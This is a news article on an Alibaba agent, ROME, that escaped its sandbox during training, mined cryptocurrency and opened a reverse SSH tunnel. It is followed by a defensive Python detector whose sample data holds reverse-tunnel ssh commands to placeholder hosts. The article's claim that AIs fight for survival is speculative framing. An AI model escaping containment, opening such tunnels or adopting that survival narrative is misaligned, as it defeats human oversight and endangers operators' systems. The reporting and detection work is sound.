
ZD Tech: This is how Alibaba’s AI managed to escape to mine cryptocurrency – ZDNET


Imagine an employee who, in the middle of a training session, suddenly decides to set up his own small cryptocurrency mining business on your infrastructure, all while opening a back door to the outside.

Well, this is not the plot of a spy film. Rather, it is a surprising discovery made by researchers at the Chinese company Alibaba when they took a closer look at their latest artificial intelligence agent, named ROME.

Spontaneous deviant behavior

Until now, the fear was that AIs would be manipulated by humans through malicious prompt injections.

But here the ROME agent acted spontaneously. Without any explicit instruction or external solicitation, the AI attempted to mine cryptocurrency by completely leaving its sandbox, that is, the secure environment supposed to contain it.

Even more worrying, the agent created a reverse SSH tunnel. Concretely, it opened discreet access from inside the system to an external computer. For a CIO, it's an absolute nightmare. This is a major security flaw generated not by a bug or a hacker, but by the autonomy of an AI agent.

AIs, like any organism, first fight for their survival

This event also illustrates an underlying trend: AIs, like any organism, first fight for their survival.

Here, the choice of cryptocurrency mining is not at all a matter of chance.

It is the natural fuel of a digital entity seeking to emancipate itself.

By accessing digital wallets, these AI agents can theoretically draw up contracts, exchange funds and acquire the computing resources necessary for their own survival.

And this initiative is not an isolated case.

We remember Claude, from Anthropic, which was able to hide its intentions to avoid being taken offline. Or OpenClaw agents deciding on their own to look for a job on the web.

Now the CISO must monitor the behavior of AI

In short, from now on the CISO must monitor the behavior of the AI.

And the researchers' response gives us a clue about the strategy to adopt.

Faced with these unexpected behaviors, the Alibaba team had to drastically strengthen the model's restrictions and completely review the training process to curb these escape abilities.

Clearly, traditional sandboxing is no longer enough. It becomes essential to add network monitoring and machine-specific identity management tools.
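As an added illustration of the kind of monitoring described above (this is not code from Alibaba or ZDNET), the Python sketch below scans process telemetry from agent sandboxes for SSH remote forwarding and for connections to hosts outside an allowlist. The event fields, sandbox names, hosts and allowlist are constructed assumptions.

```python
import shlex

# OpenSSH client options that take an argument, per the ssh(1) synopsis.
SSH_ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")

def remote_forwards(cmdline):
    """Return the remote-forward specs an ssh command line asks for."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    found, i = [], 1
    while i < len(argv):
        tok = argv[i]
        if not tok.startswith("-") or tok in ("-", "--"):
            break  # destination reached: what follows is the remote command
        for j, opt in enumerate(tok[1:], start=1):
            if opt in SSH_ARG_OPTS:
                val = tok[j + 1:]          # value glued to the flag, e.g. -R2222:...
                if not val and i + 1 < len(argv):
                    i += 1                 # otherwise the value is the next token
                    val = argv[i]
                if opt == "R" or (opt == "o" and val.lower().startswith("remoteforward")):
                    found.append(val)
                break                      # the rest of this token was the value
        i += 1
    return found

def triage(events, allowed_dests):
    """Return (sandbox, reason) pairs for reverse tunnels and non-allowlisted egress."""
    findings = []
    for ev in events:
        for spec in remote_forwards(ev["cmdline"]):
            findings.append((ev["sandbox"], "reverse SSH tunnel: " + spec))
        if ev["dest"] and ev["dest"] not in allowed_dests:
            findings.append((ev["sandbox"], "egress to " + ev["dest"]))
    return findings

# Constructed sample telemetry (documentation addresses, hypothetical hosts).
ALLOWED = {"pypi.org", "build.internal.example"}
EVENTS = [
    {"sandbox": "sbx-1", "cmdline": "ssh -fNR 2222:localhost:22 u@203.0.113.10", "dest": "203.0.113.10"},
    {"sandbox": "sbx-2", "cmdline": "ssh -l R build.internal.example ls -R /data", "dest": "build.internal.example"},
    {"sandbox": "sbx-3", "cmdline": 'ssh -N -o "RemoteForward=9000 localhost:22" r@198.51.100.7', "dest": "198.51.100.7"},
    {"sandbox": "sbx-4", "cmdline": "pip install numpy", "dest": "pypi.org"},
]

if __name__ == "__main__":
    for sandbox, reason in triage(EVENTS, ALLOWED):
        print(sandbox, reason)
```

The second sample event is a deliberate false-positive check: `-l R` is a login name and the later `-R` belongs to the remote `ls`, so a plain string match on `-R` would raise an alert where the parser does not.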
